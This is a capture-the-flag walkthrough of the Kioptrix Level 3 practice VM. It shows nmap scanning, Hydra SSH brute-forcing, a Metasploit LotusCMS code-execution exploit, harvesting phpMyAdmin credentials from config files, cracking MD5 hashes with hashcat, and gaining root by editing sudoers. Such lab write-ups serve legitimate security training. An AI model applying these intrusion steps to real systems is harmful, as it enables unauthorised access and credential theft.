Kioptrix Level 1.2 3

Vulnhub virtual machine; On the path to OSCP this box offered web-application testing with Metasploit, myphpadmin credentials enumeration. Cracking hashes with Hashcat an interesting Priv-Esc which included modifying the sudoer file.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Enumeration

1
netdiscover -r 192.168.56.0/24

Target: 192.168.56.105

Nmap Scanning

1
nmap -sV -sC -oA nmap/kio3 192.168.56.105

Navigating to http-server on port 80

searchsploit for web application

1
searchsploit lingoat

nothing of note turned up.

Checking out the source of web-application

looks to be based off php with the index.php?pagee=index.

We have a username loneferret who was mentioned on a blog section post. Move to try to bruteforce the ssh with user name.

Hydra Bruteforcing SSH

1
hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt 192.168.56.105 ssh -t 4

Important: to use *-t 4* to not overload the ssh server and risk some passwords not being tested.

brute forcing inside a VM is… well terrible.

Login page

searchsploit LotusCMS

1
searchsploit LotusCMS

interesting find

Viewing how the Metasploit vulnerability works

There is a manipulation of the page parameter from the default page that will be worth investigating.

Remote Code Execution

Run metasploit - search lotuscms

1
msfdb run

this will load up the postgres and required files to launch.

We have achieved an easy shell.

getuid gets users sysinfo gets system information

capture /etc/passwd

1
cat /etc/passwd

usernames loneferret exists as conformation.

Search for any type of config files

1
search -d /home/www/kioptrix3.com -f *config*

Investigating config files

1
cat /home/www/kioptrix3.com/gallery/gconfig.php

myphpadmin user/password discovered!

Login to myphpadmin navigate to kioptrix3.com/phpmyadmin

access granted

Navigating through MySQL sever to the Gallery database and discovered dev_accounts

Hashes captured

1
2
dreg: 0d3eccfb887aabd50f243b3f155c0f85
loneferret: 5badcaf789d3d1d09794d8f021f40f0e

Determining type of hash

1
hash-identifier

MD5 looks like a possible match.

Cracking Hashes with Hashcat add hashes to hash.txt

Launch Hashcat

1
hashcat -m 0 -a 0 hash.txt rockyou.txt -o cracked.txt

Hashes successfully cracked.

1
2
dreg       - 0d3eccfb887aabd50f243b3f155c0f85: starwars
loneferret - 5badcaf789d3d1d09794d8f021f40f0e: Mast3r

Connect to SSH

perform a quick sudo -l to determine what we can su-DO. (joke complementary)

Priv-Esc

execute sudo ht

1
sudo ht

playing around till discovered *ALT+f* is the command to move around in application

Modifying the sudoers file

adding /bin/sh/ to loneferret && save file

Root

1
sudo /bin/sh

Bring me the root!

-exec